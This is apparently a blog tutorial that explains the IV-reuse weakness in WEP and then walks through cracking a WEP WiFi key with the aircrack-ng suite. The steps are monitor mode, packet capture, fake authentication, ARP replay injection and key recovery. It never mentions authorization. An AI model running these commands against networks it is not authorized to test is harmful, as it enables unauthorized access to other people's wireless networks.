WIFI PENTESTING : HACK WEP ENCRYPTED WIFI WITH CONNECTED CLIENTS
This tutorial explains, step by step, the procedure to crack a WEP encrypted wireless network, along with the associated terms. Although it was deprecated way back in 2004, WEP still pops up in many places, as I have noticed. WEP encrypted WiFi networks are very easy to bypass. WEP uses the stream cipher RC4 for confidentiality and the CRC-32 checksum for integrity. Standard 64-bit WEP uses a 40-bit key, which is concatenated with a 24-bit initialization vector (IV) to form the RC4 key. Because RC4 is a stream cipher, the same traffic key must never be used twice. The IV is transmitted as plain text and is meant to prevent any repetition, but a 24-bit IV is not long enough to ensure this. This is the major loophole in WEP encryption. In short, if you are using WEP, stop using it right now.
Okay, let's get to the point.
In order to crack WEP encrypted WiFi we need the following:
1. First of all, of course, a computer.
2. Kali Linux (the aircrack-ng suite comes pre-installed with it).
3. A wireless USB adapter capable of injection.
Okay, let's boot into Kali and open a TERMINAL.
1. Type " airmon-ng check kill "
2. Type " airmon-ng start wlan0 "
3. Type " airodump-ng wlan0mon " (use mon0 instead of wlan0mon if you are using an older version of Kali Linux)
These commands put our WiFi adapter in monitor mode.
4. Copy the BSSID of the access point and note its channel.
5. Type " airodump-ng -c CH --bssid BSSID -w dumpfile wlan0mon "
Name the dumpfile whatever you like. It is the file in which captured IVs will be saved.
6. The #Data count should be at least 20,000 in order to crack the key.
But as you will notice, things are going very slowly, so we need to speed things up.
Open a new TERMINAL.
Type " aireplay-ng -1 0 -a BSSID wlan0mon "
Here -1 represents the fake authentication attack.
7. Type " aireplay-ng -3 0 -b BSSID wlan0mon "
Here -3 represents the ARP request replay attack.
Now the #Data count will increase dramatically because the AP is talking to us.
8. Type " aircrack-ng dumpfile "
Aircrack will crack the key as soon as it gets sufficient IVs.
Check the video below, as it contains the video tutorial with everything explained in detail, more than what I am typing here.